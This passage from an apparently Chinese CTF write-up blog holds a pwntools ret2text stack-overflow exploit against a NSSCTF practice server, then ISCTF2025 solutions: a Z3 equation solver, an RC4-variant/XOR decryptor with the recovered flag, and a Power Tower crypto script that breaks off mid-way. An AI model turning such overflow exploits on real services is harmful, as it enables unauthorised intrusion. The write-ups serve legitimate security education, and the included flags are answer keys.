p64(target_addr)<br>\u200b<br>p.sendline(payload)<br>p.interactive()<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">ret2text 64<\/h1>\n\n\n\n<p>\u6808\u6ea2\u51fa\uff0c64\u4f4d\uff0c\u76f4\u63a5ret\uff0c\u63a7\u5236\u7a0b\u5e8f\u6d41\u5230\u540e\u95e8\u51fd\u6570hint<\/p>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io = 
remote(\"node10.anna.nssctf.cn\",28349)<br>\u200b<br>offset = 8 + 48<br>ret = 0x000000000040101a<br>bin_addr = 0x00000000040136F<br>pd = b'a'*(offset)<br>pd += p64(ret)<br>pd += p64(bin_addr) <br>\u200b<br>io.sendline(pd)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">ISCTF2025<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">Z3<\/h2>\n\n\n\n<p>sub_401000\u9a8c\u8bc1\u51fd\u6570<\/p>\n\n\n\n<p>\u8be5\u51fd\u6570\u5305\u542b23\u4e2a\u590d\u6742\u7684\u7ebf\u6027\u65b9\u7a0b\uff0c\u6bcf\u4e2a\u65b9\u7a0b\u90fd\u6d89\u53ca23\u4e2a\u53d8\u91cf\u7684\u7ebf\u6027\u7ec4\u5408\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from z3 import *<br>\u200b<br>\u200b<br>a = &#91;BitVec(f'a{i}', 8) for i in range(23)]<br>\u200b<br>s = Solver()<br>\u200b<br>\u200b<br>\u200b<br># \u65b9\u7a0b1<br>s.add(94*a&#91;22] + 74*a&#91;21] + 70*a&#91;19] + 12*a&#91;18] + 20*a&#91;16] + 62*a&#91;12] + 82*a&#91;10] + 7*a&#91;7] + 63*a&#91;6] + 18*a&#91;5] + 58*a&#91;4] + 94*a&#91;2] + 77*a&#91;0] - 43*a&#91;1] - 37*a&#91;3] - 97*a&#91;8] - 23*a&#91;9] - 86*a&#91;11] - 6*a&#91;13] - 5*a&#91;14] - 79*a&#91;15] - 63*a&#91;17] - 93*a&#91;20] == 20156)<br>\u200b<br># \u65b9\u7a0b2<br>s.add(87*a&#91;22] + 75*a&#91;21] + 73*a&#91;15] + 67*a&#91;14] + 30*a&#91;13] + (a&#91;11] &lt;&lt; 6) + 35*a&#91;9] + 91*a&#91;7] + 91*a&#91;5] + 34*a&#91;3] + 74*a&#91;0] - 89*a&#91;1] - 72*a&#91;2] - 76*a&#91;4] - 32*a&#91;6] - 97*a&#91;8] - 39*a&#91;10] - 23*a&#91;12] + 8*a&#91;16] - 98*a&#91;17] - 4*a&#91;18] - 80*a&#91;19] - 83*a&#91;20] == 7183)<br>\u200b<br># \u65b9\u7a0b3<br>s.add(51*a&#91;21] + 22*a&#91;20] + 15*a&#91;19] + 51*a&#91;17] + 96*a&#91;12] + 34*a&#91;7] + 77*a&#91;5] + 59*a&#91;2] + 89*a&#91;1] + 92*a&#91;0] - 85*a&#91;3] - 50*a&#91;4] - 51*a&#91;6] - 75*a&#91;8] - 40*a&#91;10] - 4*a&#91;11] - 74*a&#91;13] - 98*a&#91;14] - 23*a&#91;15] - 14*a&#91;16] - 92*a&#91;18] - 7*a&#91;22] == -7388)<br>\u200b<br># \u65b9\u7a0b4<br>s.add(61*a&#91;22] + 72*a&#91;21] + 28*a&#91;20] + 
55*a&#91;18] + 20*a&#91;17] + 13*a&#91;14] + 51*a&#91;13] + 69*a&#91;12] + 10*a&#91;11] + 95*a&#91;10] + 43*a&#91;9] + 53*a&#91;8] + 76*a&#91;7] + 25*a&#91;6] + 9*a&#91;5] + 10*a&#91;4] + 98*a&#91;1] + 70*a&#91;0] - 22*a&#91;2] + 2*a&#91;3] - 49*a&#91;15] + 4*a&#91;16] - 77*a&#91;19] == 69057)<br>\u200b<br># \u65b9\u7a0b5<br>s.add(7*a&#91;22] + 21*a&#91;16] + 22*a&#91;13] + 55*a&#91;9] + 66*a&#91;8] + 78*a&#91;5] + 10*a&#91;3] + 80*a&#91;1] + 65*a&#91;0] - 20*a&#91;2] - 53*a&#91;4] - 98*a&#91;6] + 8*a&#91;7] - 78*a&#91;10] - 94*a&#91;11] - 93*a&#91;12] - 18*a&#91;14] - 48*a&#91;15] - 9*a&#91;17] - 73*a&#91;18] - 59*a&#91;19] - 68*a&#91;20] - 74*a&#91;21] == -31438)<br>\u200b<br># \u65b9\u7a0b6<br>s.add(33*a&#91;19] + 78*a&#91;15] + 66*a&#91;10] + 3*a&#91;9] + 43*a&#91;4] + 24*a&#91;3] + 3*a&#91;2] + 27*a&#91;0] - 18*a&#91;1] - 46*a&#91;5] - 18*a&#91;6] - a&#91;7] - 33*a&#91;8] - 50*a&#91;11] - 23*a&#91;12] - 37*a&#91;13] - 45*a&#91;14] + 2*a&#91;16] - a&#91;17] - 60*a&#91;18] - 87*a&#91;20] - 72*a&#91;21] - 6*a&#91;22] == -26121)<br>\u200b<br># \u65b9\u7a0b7<br>s.add(31*a&#91;20] + 80*a&#91;18] + 34*a&#91;17] + 34*a&#91;15] + 38*a&#91;14] + 53*a&#91;13] + 35*a&#91;12] + 82*a&#91;9] + 27*a&#91;8] + 80*a&#91;7] + 46*a&#91;6] + 18*a&#91;4] + 5*a&#91;1] + 98*a&#91;0] - 12*a&#91;2] - 9*a&#91;3] - 57*a&#91;5] - 46*a&#91;10] - 31*a&#91;11] - 68*a&#91;16] - 94*a&#91;19] - 93*a&#91;21] - 15*a&#91;22] == 26005)<br>\u200b<br># \u65b9\u7a0b8<br>s.add(81*a&#91;21] + 40*a&#91;20] + 34*a&#91;19] + 94*a&#91;18] + 98*a&#91;17] + 11*a&#91;14] + 63*a&#91;13] + 95*a&#91;12] + 43*a&#91;11] + 99*a&#91;10] + 29*a&#91;9] + 81*a&#91;6] + 72*a&#91;5] + 54*a&#91;3] + 21*a&#91;0] - 26*a&#91;1] - 90*a&#91;2] - 15*a&#91;4] - 54*a&#91;7] - 12*a&#91;8] - 38*a&#91;15] - 15*a&#91;16] - 56*a&#91;22] == 57169)<br>\u200b<br># \u65b9\u7a0b9<br>s.add(71*a&#91;18] + 39*a&#91;17] + 73*a&#91;15] + 14*a&#91;14] + 56*a&#91;12] + 56*a&#91;10] + 27*a&#91;9] + 68*a&#91;7] + 39*a&#91;6] + 26*a&#91;5] + 
40*a&#91;4] + 24*a&#91;3] + 11*a&#91;2] + 14*a&#91;1] + 94*a&#91;0] - 10*a&#91;8] - 11*a&#91;11] - 63*a&#91;13] - 39*a&#91;16] - 14*a&#91;19] - 17*a&#91;20] - 23*a&#91;21] - 7*a&#91;22] == 40024)<br>\u200b<br># \u65b9\u7a0b10<br>s.add((a&#91;22] &lt;&lt; 6) + 80*a&#91;21] + 89*a&#91;20] + 70*a&#91;19] + 66*a&#91;18] + 55*a&#91;17] + 16*a&#91;16] + 84*a&#91;13] + 48*a&#91;12] + 11*a&#91;7] + 32*a&#91;5] + 99*a&#91;0] - 26*a&#91;1] - 91*a&#91;2] - 96*a&#91;3] - 63*a&#91;4] - 67*a&#91;6] - 72*a&#91;8] + 4*a&#91;9] - 84*a&#91;10] - 81*a&#91;11] - 80*a&#91;14] - 98*a&#91;15] == 432)<br>\u200b<br># \u65b9\u7a0b11<br>s.add(a&#91;21] + 41*a&#91;17] + 46*a&#91;12] + 44*a&#91;9] + 63*a&#91;0] - 73*a&#91;1] - 43*a&#91;2] + 4*a&#91;3] - 37*a&#91;4] - 54*a&#91;5] - 58*a&#91;6] - 95*a&#91;7] - 2*a&#91;8] - 37*a&#91;10] - 5*a&#91;11] + 2*a&#91;13] - 46*a&#91;14] - 27*a&#91;15] - 19*a&#91;16] - 78*a&#91;18] - 51*a&#91;19] - 82*a&#91;20] - 59*a&#91;22] == -57338)<br>\u200b<br># \u65b9\u7a0b12<br>s.add(10*a&#91;22] + 58*a&#91;18] + 16*a&#91;17] + 69*a&#91;16] + 6*a&#91;15] + 5*a&#91;12] + 87*a&#91;7] + 47*a&#91;5] + 91*a&#91;4] + 54*a&#91;2] + 21*a&#91;1] + 52*a&#91;0] - 76*a&#91;3] - 96*a&#91;6] - 27*a&#91;8] - 43*a&#91;9] - 15*a&#91;10] - 35*a&#91;11] - 53*a&#91;13] + 4*a&#91;14] - 83*a&#91;19] - 68*a&#91;20] - 18*a&#91;21] == 1777)<br>\u200b<br># \u65b9\u7a0b13<br>s.add(66*a&#91;22] + 92*a&#91;21] + 29*a&#91;20] + 42*a&#91;19] + 55*a&#91;14] + 72*a&#91;13] + 40*a&#91;12] + 31*a&#91;10] + 88*a&#91;9] + 61*a&#91;8] + 59*a&#91;7] + 35*a&#91;6] + 16*a&#91;3] + 24*a&#91;1] + 60*a&#91;0] - 55*a&#91;2] - 8*a&#91;4] - 7*a&#91;5] - 17*a&#91;11] - 25*a&#91;15] - 22*a&#91;16] - 10*a&#91;17] - 59*a&#91;18] == 47727)<br>\u200b<br># \u65b9\u7a0b14<br>s.add(3*a&#91;21] + 54*a&#91;18] + 6*a&#91;15] + 93*a&#91;14] + 74*a&#91;10] + 6*a&#91;7] + 98*a&#91;4] + 65*a&#91;3] + 84*a&#91;2] + 18*a&#91;1] + 35*a&#91;0] - 29*a&#91;5] - 40*a&#91;6] - 35*a&#91;8] + 8*a&#91;9] - 15*a&#91;11] - 4*a&#91;12] - 
83*a&#91;16] - 74*a&#91;17] - 72*a&#91;19] - 53*a&#91;20] - 31*a&#91;22] == 6695)<br>\u200b<br># \u65b9\u7a0b15<br>s.add(45*a&#91;20] + 14*a&#91;19] + 76*a&#91;18] + 17*a&#91;16] + 86*a&#91;14] + 28*a&#91;11] + 19*a&#91;5] + 46*a&#91;1] + 75*a&#91;0] - 12*a&#91;2] - 27*a&#91;3] - 66*a&#91;4] - 27*a&#91;6] - 32*a&#91;7] - 69*a&#91;8] - 31*a&#91;9] - 65*a&#91;10] - 54*a&#91;12] - 6*a&#91;13] + 2*a&#91;15] - 10*a&#91;17] - 89*a&#91;21] - 16*a&#91;22] == -3780)<br>\u200b<br># \u65b9\u7a0b16<br>s.add(62*a&#91;21] + 74*a&#91;20] + 28*a&#91;18] + 7*a&#91;17] + 74*a&#91;16] + 45*a&#91;15] + 57*a&#91;14] + 34*a&#91;11] + 85*a&#91;10] + 98*a&#91;6] + 29*a&#91;4] + 94*a&#91;3] + 51*a&#91;2] + 85*a&#91;1] - 36*a&#91;5] - a&#91;7] - 3*a&#91;8] - 74*a&#91;9] - 70*a&#91;12] - 68*a&#91;13] - 3*a&#91;19] + 8*a&#91;22] == 47300)<br>\u200b<br># \u65b9\u7a0b17<br>s.add(22*a&#91;22] + 45*a&#91;21] + 14*a&#91;19] + 32*a&#91;18] + 77*a&#91;17] + 70*a&#91;12] + 7*a&#91;10] + 99*a&#91;4] + 82*a&#91;0] - 48*a&#91;1] - 40*a&#91;2] - 81*a&#91;3] - 27*a&#91;5] - 75*a&#91;6] - 79*a&#91;7] - 26*a&#91;8] - 68*a&#91;9] - 57*a&#91;11] - 77*a&#91;13] - 32*a&#91;14] - a&#91;15] - 91*a&#91;16] - 14*a&#91;20] == -34153)<br>\u200b<br># \u65b9\u7a0b18<br>s.add(65*a&#91;21] + 13*a&#91;20] + 61*a&#91;17] + 97*a&#91;13] + 24*a&#91;10] + 40*a&#91;5] + 20*a&#91;0] - 81*a&#91;1] - 17*a&#91;2] - 77*a&#91;3] - 79*a&#91;4] - 45*a&#91;6] - 61*a&#91;7] - 48*a&#91;8] - 97*a&#91;9] - 49*a&#91;11] - 14*a&#91;12] - 81*a&#91;14] - 20*a&#91;15] - 27*a&#91;16] - 89*a&#91;18] - 93*a&#91;19] - 46*a&#91;22] == -55479)<br>\u200b<br># \u65b9\u7a0b19<br>s.add(60*a&#91;21] + 70*a&#91;20] + 13*a&#91;15] + 87*a&#91;13] + 76*a&#91;11] + 88*a&#91;9] + 87*a&#91;3] + 87*a&#91;0] - 97*a&#91;1] - 40*a&#91;2] - 49*a&#91;4] - 23*a&#91;5] - 30*a&#91;6] - 50*a&#91;7] - 98*a&#91;8] - 21*a&#91;10] - 54*a&#91;12] - 65*a&#91;14] - 80*a&#91;17] - 28*a&#91;18] - 57*a&#91;19] - 70*a&#91;22] == -20651)<br>\u200b<br># 
\u65b9\u7a0b20<br>s.add(54*a&#91;20] + 86*a&#91;17] + 92*a&#91;16] + 41*a&#91;15] + 70*a&#91;10] + 9*a&#91;9] + a&#91;8] + 96*a&#91;7] + 45*a&#91;6] + 78*a&#91;5] + 3*a&#91;4] + 90*a&#91;3] + 71*a&#91;2] + 96*a&#91;0] - 8*a&#91;1] + 4*a&#91;11] - 55*a&#91;12] - 73*a&#91;13] - 54*a&#91;14] - 89*a&#91;18] - (a&#91;19] &lt;&lt; 6) - 67*a&#91;21] + 4*a&#91;22] == 35926)<br>\u200b<br># \u65b9\u7a0b21<br>s.add(5*a&#91;22] + 88*a&#91;20] + 52*a&#91;19] + 21*a&#91;17] + 25*a&#91;16] + 3*a&#91;13] + 88*a&#91;10] + 39*a&#91;8] + 48*a&#91;7] + 74*a&#91;6] + 86*a&#91;4] + 46*a&#91;2] + 17*a&#91;0] - 98*a&#91;1] - 50*a&#91;3] - 28*a&#91;5] - 73*a&#91;9] - 33*a&#91;11] - 75*a&#91;12] - 14*a&#91;14] - 31*a&#91;15] - 26*a&#91;18] - 52*a&#91;21] == 8283)<br>\u200b<br># \u65b9\u7a0b22<br>s.add(96*a&#91;22] + 85*a&#91;20] + 55*a&#91;19] + 99*a&#91;13] + 19*a&#91;11] + 77*a&#91;10] + 52*a&#91;9] + 66*a&#91;8] + 96*a&#91;6] + 72*a&#91;4] + 90*a&#91;3] + 60*a&#91;1] + 94*a&#91;0] - 99*a&#91;2] - 26*a&#91;5] - 94*a&#91;7] - 49*a&#91;12] - 32*a&#91;14] - 54*a&#91;15] - 92*a&#91;16] - 71*a&#91;17] - 63*a&#91;18] - 23*a&#91;21] == 33789)<br>\u200b<br># \u65b9\u7a0b23<br>s.add(15*a&#91;22] + a&#91;19] + 26*a&#91;17] + 65*a&#91;16] + 80*a&#91;11] + 92*a&#91;8] + 28*a&#91;5] + 79*a&#91;4] + 73*a&#91;0] - 98*a&#91;1] - 2*a&#91;2] - 70*a&#91;3] - 10*a&#91;6] - 30*a&#91;7] - 51*a&#91;9] - 77*a&#91;10] - 32*a&#91;12] - 32*a&#91;13] + 8*a&#91;14] + 4*a&#91;15] - 11*a&#91;18] - 83*a&#91;20] - 85*a&#91;21] == -10455)<br>\u200b<br>\u200b<br>print(\"\u5f00\u59cb\u6c42\u89e3...\")<br>if s.check() == sat:<br> &nbsp;  print(\"\u627e\u5230\u89e3\uff01\")<br> &nbsp;  m = s.model()<br> &nbsp; &nbsp;<br> &nbsp;  # \u83b7\u53d6\u89e3\u5e76\u8f6c\u6362\u4e3a\u5b57\u8282<br> &nbsp;  solution = &#91;m&#91;a&#91;i]].as_long() for i in range(23)]<br> &nbsp; &nbsp;<br> &nbsp;  print(\"\u5f02\u6216\u540e\u7684\u503c:\", solution)<br> &nbsp;  print(\"\u5f02\u6216\u540e\u7684\u5b57\u7b26\u4e32:\", ''.join(&#91;chr(c) 
for c in solution]))<br> &nbsp; &nbsp;<br> &nbsp;  original = &#91;c ^ 0xC for c in solution]<br> &nbsp;  print(\"\u539f\u59cbflag:\", ''.join(&#91;chr(c) for c in original]))<br>else:<br> &nbsp;  print(\"\u65e0\u89e3\")<br> &nbsp;  print(s.check())<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">MysteriousStream<\/h2>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u521d\u6b65\u5206\u6790<\/strong><\/li>\n<\/ol>\n\n\n\n<p>\u62ff\u5230\u9898\u76ee\u540e\uff0c\u5305\u542b\u4e00\u4e2a\u4e8c\u8fdb\u5236\u6587\u4ef6 <code>challenge<\/code> \u548c\u4e00\u4e2a\u6570\u636e\u6587\u4ef6 <code>payload.dat<\/code>\u3002 \u9996\u5148\u67e5\u770b <code>challenge<\/code> \u7684\u5b57\u7b26\u4e32\u4fe1\u606f\uff0c\u53d1\u73b0\u4e86\u51e0\u4e2a\u5173\u952e\u5b57\u7b26\u4e32\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>Secr3tK3<\/code><\/li>\n\n\n\n<li><code>P4ssXOR<\/code><\/li>\n\n\n\n<li><code>rc4_variant<\/code><\/li>\n\n\n\n<li><code>xor_cycle<\/code><\/li>\n<\/ul>\n\n\n\n<p>\u8fd9\u4e9b\u5b57\u7b26\u4e32\u6697\u793a\u4e86\u9898\u76ee\u53ef\u80fd\u6d89\u53ca RC4 \u52a0\u5bc6\u53d8\u79cd\u4ee5\u53ca\u5f02\u6216\u64cd\u4f5c\u3002<\/p>\n\n\n\n<ol start=\"2\" class=\"wp-block-list\">\n<li><strong>\u9006\u5411\u5206\u6790<\/strong><\/li>\n<\/ol>\n\n\n\n<p>\u4f7f\u7528 IDA \u6216\u53cd\u6c47\u7f16\u5de5\u5177\u5206\u6790\u4e3b\u8981\u903b\u8f91\uff08\u7ed3\u5408\u52a8\u6001\u8c03\u8bd5\u6216\u9759\u6001\u5206\u6790\uff09\uff1a<\/p>\n\n\n\n<p>\u5bc6\u94a5\u6784\u5efa<\/p>\n\n\n\n<p>\u5728\u4ee3\u7801\u4e2d\u53d1\u73b0\u5bf9 <code>Secr3tK3<\/code> \u7684\u5904\u7406\u3002\u7a0b\u5e8f\u5e76\u4e0d\u662f\u76f4\u63a5\u4f7f\u7528 <code>Secr3tK3<\/code>\uff0c\u800c\u5728\u5176\u540e\u62fc\u63a5\u4e86 <code>y!<\/code> (0x79, 0x21)\u3002<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">mov word ptr [rsp + 0x16], 0x2179 &nbsp;; \u8ffd\u52a0 \"y!\"<\/pre>\n\n\n\n<p>\u6240\u4ee5 RC4 \u7684\u5b9e\u9645\u5bc6\u94a5\u4e3a 
<code>Secr3tK3y!<\/code>\u3002<\/p>\n\n\n\n<p><strong>\u52a0\u5bc6\u903b\u8f91<\/strong><\/p>\n\n\n\n<p>\u7a0b\u5e8f\u4e3b\u8981\u6d41\u7a0b\u662f\u5bf9\u8f93\u5165\u6570\u636e\u8fdb\u884c\u4e24\u6b65\u64cd\u4f5c\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>RC4 \u53d8\u79cd\u89e3\u5bc6<\/strong><\/li>\n\n\n\n<li><strong>\u5faa\u73af\u5f02\u6216 (XOR Cycle)<\/strong><\/li>\n<\/ol>\n\n\n\n<p><strong>RC4 \u53d8\u79cd\u5206\u6790<\/strong>\uff1a \u6807\u51c6\u7684 RC4 KSA\uff08\u5bc6\u94a5\u8c03\u5ea6\u7b97\u6cd5\uff09\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>j = (j + S&#91;i] + key&#91;i % len(key)]) % 256<\/code><\/pre>\n\n\n\n<p>\u4f46\u5728\u672c\u9898\u7684\u6c47\u7f16\u4ee3\u7801\u4e2d\uff0cKSA \u589e\u52a0\u4e86\u4e00\u4e2a\u989d\u5916\u7684\u9879 <code>(i &amp; 0xAA)<\/code>\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mov edx, ecx<br>and edx, 0xaa<br>add eax, edx ; eax \u7d2f\u52a0\u4e86 (i &amp; 0xAA)<\/code><\/pre>\n\n\n\n<p>\u8fd8\u539f\u540e\u7684 KSA \u903b\u8f91\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>j = (j + S&#91;i] + key&#91;i % len(key)] + (i &amp; 0xAA)) % 256<\/code><\/pre>\n\n\n\n<p>PRGA\uff08\u4f2a\u968f\u673a\u6570\u751f\u6210\uff09\u90e8\u5206\u4e0e\u6807\u51c6 RC4 \u4e00\u81f4\u3002<\/p>\n\n\n\n<p><strong>XOR Cycle \u5206\u6790<\/strong>\uff1a RC4 \u5904\u7406\u540e\u7684\u6570\u636e\uff0c\u4e0e\u5bc6\u94a5 <code>P4ssXOR<\/code> \u8fdb\u884c\u5faa\u73af\u5f02\u6216\u3002<\/p>\n\n\n\n<p><strong>3. 
\u89e3\u5bc6\u811a\u672c<\/strong><\/p>\n\n\n\n<p>\u6839\u636e\u5206\u6790\u7684\u903b\u8f91\uff0c\u7f16\u5199 Python \u811a\u672c\u89e3\u5bc6 <code>payload.dat<\/code>\u3002\u7531\u4e8e\u6d41\u5bc6\u7801\uff08RC4\uff09\u548c\u5f02\u6216\u8fd0\u7b97\u90fd\u662f\u5bf9\u79f0\u7684\uff08\u6216\u81ea\u53cd\u7684\uff09\uff0c\u5982\u679c\u7a0b\u5e8f\u662f\u201c\u89e3\u5bc6\u5e76\u6253\u5370\u201d\uff0c\u6211\u4eec\u53ea\u9700\u8981\u91cd\u73b0\u7a0b\u5e8f\u7684\u903b\u8f91\u5373\u53ef\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import binascii<br>\u200b<br>def solve():<br> &nbsp; &nbsp;# 1. \u8bfb\u53d6 payload<br> &nbsp; &nbsp;# payload.dat \u7684\u5341\u516d\u8fdb\u5236\u5185\u5bb9<br> &nbsp; &nbsp;payload_hex = \"f1c652acab33ee6873cea53f0e0eb7fdc731be9aa7e8d41fe04b3154ff7cccd2160b4034e6b815bf\"<br> &nbsp; &nbsp;data = binascii.unhexlify(payload_hex)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# 2. \u51c6\u5907\u5bc6\u94a5<br> &nbsp; &nbsp;key_rc4 = b\"Secr3tK3y!\" &nbsp;# \u8fd0\u884c\u65f6\u6784\u5efa\u7684\u5bc6\u94a5<br> &nbsp; &nbsp;key_xor = b\"P4ssXOR\" &nbsp; &nbsp; # \u9759\u6001\u5b57\u7b26\u4e32<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# 3. RC4 \u53d8\u79cd\u521d\u59cb\u5316 (KSA)<br> &nbsp; &nbsp;S = list(range(256))<br> &nbsp; &nbsp;j = 0<br> &nbsp; &nbsp;for i in range(256):<br> &nbsp; &nbsp; &nbsp; &nbsp;# \u53d8\u79cd\u903b\u8f91\uff1a\u589e\u52a0\u4e86 (i &amp; 0xAA)<br> &nbsp; &nbsp; &nbsp; &nbsp;j = (j + S&#91;i] + key_rc4&#91;i % len(key_rc4)] + (i &amp; 0xAA)) % 256<br> &nbsp; &nbsp; &nbsp; &nbsp;S&#91;i], S&#91;j] = S&#91;j], S&#91;i]<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;# 4. 
RC4 \u89e3\u5bc6 (PRGA)<br> &nbsp; &nbsp;i = 0<br> &nbsp; &nbsp;j = 0<br> &nbsp; &nbsp;rc4_output = &#91;]<br> &nbsp; &nbsp;for char in data:<br> &nbsp; &nbsp; &nbsp; &nbsp;i = (i + 1) % 256<br> &nbsp; &nbsp; &nbsp; &nbsp;j = (j + S&#91;i]) % 256<br> &nbsp; &nbsp; &nbsp; &nbsp;S&#91;i], S&#91;j] = S&#91;j], S&#91;i]<br> &nbsp; &nbsp; &nbsp; &nbsp;k = S&#91;(S&#91;i] + S&#91;j]) % 256]<br> &nbsp; &nbsp; &nbsp; &nbsp;rc4_output.append(char ^ k)<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;# 5. XOR Cycle \u89e3\u5bc6<br> &nbsp; &nbsp;flag = &#91;]<br> &nbsp; &nbsp;for idx, char in enumerate(rc4_output):<br> &nbsp; &nbsp; &nbsp; &nbsp;k = key_xor&#91;idx % len(key_xor)]<br> &nbsp; &nbsp; &nbsp; &nbsp;flag.append(char ^ k)<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;print(bytes(flag).decode('utf-8'))<br>\u200b<br>if __name__ == \"__main__\":<br> &nbsp; &nbsp;solve()<\/code><\/pre>\n\n\n\n<p><strong>4. \u83b7\u53d6 Flag<\/strong><\/p>\n\n\n\n<p>\u8fd0\u884c\u811a\u672c\u8f93\u51fa\u6700\u7ec8 Flag\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ISCTF{Y0u_a2e_2ea11y_a_1aby2inth_master}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Power tower<\/h2>\n\n\n\n<p>\u9898\u76ee\u7ed9\u51fa\u4e86\u4e00\u4e2a\u52a0\u5bc6\u811a\u672c\u548c\u4e09\u4e2a\u503c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from Crypto.Util.number import *<br>import random<br>\u200b<br>m = b'ISCTF{****************}'<br>flag = bytes_to_long(m)<br>n = getPrime(256)<br>t = getPrime(63)<br>l = pow(2, pow(2, t), n)<br>c = flag ^ l<br>print(t)<br>print(n)<br>print(c)<\/code><\/pre>\n\n\n\n<p><strong>\u5df2\u77e5\u6761\u4ef6\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>t = 6039738711082505929<\/code><\/li>\n\n\n\n<li><code>n = 107502945843251244337535082460697583639357473016005252008262865481138355040617<\/code><\/li>\n\n\n\n<li><code>c = 
114092817888610184061306568177474033648737936326143099257250807529088213565247<\/code><\/li>\n<\/ul>\n\n\n\n<p><strong>\u52a0\u5bc6\u8fc7\u7a0b\uff1a<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u5c06 flag \u8f6c\u6362\u4e3a\u957f\u6574\u6570<\/li>\n\n\n\n<li>\u751f\u6210\u4e24\u4e2a\u968f\u673a\u7d20\u6570\uff1a<code>n<\/code> (256\u4f4d) \u548c <code>t<\/code> (63\u4f4d)<\/li>\n\n\n\n<li>\u8ba1\u7b97 <code>l = 2^(2^t) mod n<\/code>\uff08\u8fd9\u662f\u4e00\u4e2a\u5e42\u5854\u7ed3\u6784\uff09<\/li>\n\n\n\n<li>\u8ba1\u7b97\u5bc6\u6587 <code>c = flag XOR l<\/code><\/li>\n<\/ol>\n\n\n\n<p>\u89e3\u9898\u601d\u8def<\/p>\n\n\n\n<p>\u8981\u89e3\u5bc6 flag\uff0c\u9700\u8981\u8ba1\u7b97 <code>l = 2^(2^t) mod n<\/code>\uff0c\u7136\u540e\u901a\u8fc7 <code>flag = c XOR l<\/code> \u5f97\u5230 flag\u3002<\/p>\n\n\n\n<p>\u4f46\u662f <code>2^t<\/code> \u662f\u4e00\u4e2a\u5929\u6587\u6570\u5b57\uff08<code>2^6039738711082505929<\/code>\uff09\uff0c\u65e0\u6cd5\u76f4\u63a5\u8ba1\u7b97\u3002\u6211\u4eec\u9700\u8981\u4f7f\u7528<strong>\u6b27\u62c9\u5b9a\u7406<\/strong>\u6765\u7b80\u5316\u8fd9\u4e2a\u8ba1\u7b97\u3002<\/p>\n\n\n\n<p><strong>\u6b27\u62c9\u5b9a\u7406\uff1a<\/strong> \u5982\u679c <code>gcd(a, n) = 1<\/code>\uff0c\u5219 <code>a^\u03c6(n) \u2261 1 (mod n)<\/code><\/p>\n\n\n\n<p>\u5176\u4e2d <code>\u03c6(n)<\/code> \u662f\u6b27\u62c9\u51fd\u6570\uff0c\u8868\u793a\u5c0f\u4e8e <code>n<\/code> \u4e14\u4e0e <code>n<\/code> \u4e92\u8d28\u7684\u6b63\u6574\u6570\u7684\u4e2a\u6570\u3002<\/p>\n\n\n\n<p><strong>\u5e94\u7528\uff1a<\/strong><\/p>\n\n\n\n<p>\u5bf9\u4e8e <code>2^(2^t) mod n<\/code>\uff0c\u5982\u679c <code>gcd(2, n) = 1<\/code>\uff08\u901a\u5e38\u6210\u7acb\uff0c\u56e0\u4e3a <code>n<\/code> \u662f\u5947\u6570\uff09\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u6b27\u62c9\u5b9a\u7406\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">2^(2^t) mod n = 2^(2^t mod \u03c6(n)) mod n<\/pre>\n\n\n\n<p>\u8fd9\u6837\uff0c\u6211\u4eec\u53ea\u9700\u8981\uff1a<\/p>\n\n\n\n<ol 
class=\"wp-block-list\">\n<li>\u5206\u89e3 <code>n<\/code> \u5f97\u5230\u5176\u56e0\u5b50<\/li>\n\n\n\n<li>\u8ba1\u7b97 <code>\u03c6(n)<\/code><\/li>\n\n\n\n<li>\u8ba1\u7b97 <code>2^t mod \u03c6(n)<\/code>\uff08\u8fd9\u4e2a\u53ef\u4ee5\u8ba1\u7b97\uff0c\u56e0\u4e3a <code>\u03c6(n) &lt; n<\/code>\uff09<\/li>\n\n\n\n<li>\u8ba1\u7b97 <code>2^(2^t mod \u03c6(n)) mod n<\/code><\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-preformatted\">#!\/usr\/bin\/env sage<br># -*- coding: utf-8 -*-<br>\u200b<br>\"\"\"<br>Power Tower \u89e3\u5bc6\u811a\u672c<br>\u4f7f\u7528 SageMath \u8fdb\u884c\u5927\u6570\u5206\u89e3\u548c\u6a21\u5e42\u8fd0\u7b97<br>\"\"\"<br>\u200b<br># \u7ed9\u5b9a\u7684\u503c<br>t = 6039738711082505929<br>n = 107502945843251244337535082460697583639357473016005252008262865481138355040617<br>c = 114092817888610184061306568177474033648737936326143099257250807529088213565247<br>\u200b<br>print(\"=\" * 60)<br>print(\"Power Tower \u89e3\u5bc6\")<br>print(\"=\" * 60)<br>print(\"t = \" + str(t))<br>print(\"n = \" + str(n))<br>print(\"c = \" + str(c))<br>print()<br>\u200b<br># \u5c06 n \u8f6c\u6362\u4e3a SageMath \u6574\u6570<br>n = Integer(n)<br>c = Integer(c)<br>t = Integer(t)<br>\u200b<br># \u5206\u89e3 